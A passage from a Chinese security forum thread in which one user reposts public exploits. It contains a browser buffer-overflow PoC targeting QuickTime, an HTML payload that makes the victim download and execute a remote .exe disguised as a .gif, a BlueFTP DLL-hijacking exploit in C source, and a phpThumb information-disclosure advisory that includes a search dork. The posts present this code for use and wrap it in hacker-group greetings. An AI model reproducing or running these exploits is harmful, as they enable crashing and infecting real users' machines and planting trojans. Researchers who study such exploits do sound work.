# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Remote { Buffer Overflow + Download/Exec File (Tr0j4n3) }
# Tested on : Windows XP SP3 Fr (Firefox 4.0 + Safari 4.0.5 & IE7) << QuickTime v7.5.5
###
# (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends
###
-->

#=======[ PoC (1) Buffer Overflow & Crash !]============>

<html><head>
<script src="res://mshtml.dll/objectembed.js"></script>
<script language="javascript">
function boom()
{
var longunistring1 = unescape("%u4141%u4141");
var longunistring2 = unescape("%u4242%u4242");
var longunistring3 = unescape("%u4343%u4343");
var longunistring4 = unescape("%u4444%u4444");
for(i=0; i <= 999 ; ++i)
{
longunistring1+=longunistring1;
longunistring2+=longunistring2;
longunistring3+=longunistring3;
longunistring4+=longunistring4;
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
}   
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
document.write(document.body.innerHTML);
}
var objectSource = boom();
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>

#=======[ PoC (2) Download/Exec File]============>

<html><head>
<script src="res://mshtml.dll/objectembed.js"></script>
<script language="javascript">
var objectSource = "http://[HOST]/{file}.exe.gif";
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>

# Save Any HTML Code and Use him (Boom !! :D)
<!--
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== 
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + Caddy-Dz (exploit-id.com) ... All Others * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...
#================================================================================================
-->


B10层 发表时间: 11-05-19 20:49

回复: DarK-Z [bridex]   论坛用户   登录
SEBUG-ID:20523
发布时间:2011-05-06
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
# Exploit Title: phpThumb 'phpThumbDebug' Information Disclosure
# Google Dork: inurl:phpThumb.php
# Date: 06/05/2011
# Author: mook
# Software Link: http://phpthumb.sourceforge.net/#download
# Version: 1.7.9
# Tested on: linux

Vulnerability:

Information disclosure which includes absolute system paths, os
flavour, application configuration information and other installed
application versions.

The vulnerability can be triggered by appending 'phpThumbDebug=" and
any number from 0 to 10 to any phpThumb.php request. e.g:



The response will be an image render of the debug information.

Remediation:

The responsible code can be found in phpThumb.php itself by changing
the default "$PHPTHUMB_CONFIG['disable_debug']            = false;" to
"$PHPTHUMB_CONFIG['disable_debug']            = true;".// sebug.net [2011-05-08]


B11层 发表时间: 11-05-19 20:50

回复: DarK-Z [bridex]   论坛用户   登录
BlueFTP 1.2 DLL Hijacking Exploit (ProfUIS250m.dll)

B12层 发表时间: 11-05-19 20:51

回复: DarK-Z [bridex]   论坛用户   登录
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0    _                  __          __      __                    1
1  /' \            __  /'__`\        /\ \__  /'__`\                  0
0  /\_, \    ___  /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___          1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0    \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/          1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\          0
0      \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/          1
1                  \ \____/ >> Exploit database separated by exploit  0
0                  \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                  0
1  [+] Support e-mail  : submit[at]1337day.com                        1
0                                                                      0
1              #########################################              1
0              I'm KedAns-Dz member from Inj3ct0r Team                1
1              #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# ======[ Exploit DLL C0de ====>

/*
###
# Title : BlueFTP 1.2 DLL Hijacking Exploit (ProfUIS250m.dll)
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com / exploit-id.com
# Twitter page : twitter.com/kedans
# platform : Windows
# Target : BlueFTP 1.2
# Tested on : Windows XP sp3 France
###
1. Compile dll
2. Replace 'BlueFTP 1.2' in 'BlueVoda Website Builder' directory with your newly compiled dll
3. Reboot or Startup BlueFTP
4. Boom calc!
###
*/

#include <windows.h>
#define DllExport __declspec (dllexport)

DllExport void hook_startup() { Viva_Juventus(); }

int Viva_Juventus()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

/*
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== 

# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + kaMtiEz (exploit-id.com) ... All Others * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * KelvinX (kelvinx.net) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
*/

B13层 发表时间: 11-05-19 20:52

回复: DarK-Z [bridex]   论坛用户   登录
EXPLOIT 工具包 多功能
http://auction1.paipai.com/14E8366C0000000000143AF40797F580

大家点啊,最拽的溢出工具包啊!



[此贴被 DarK-Z(bridex) 在 05月19日20时59分 编辑过]

B14层 发表时间: 11-05-19 20:56

回复: DarK-Z [bridex]   论坛用户   登录
呵,你上当了~

B15层 发表时间: 11-05-20 11:01

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号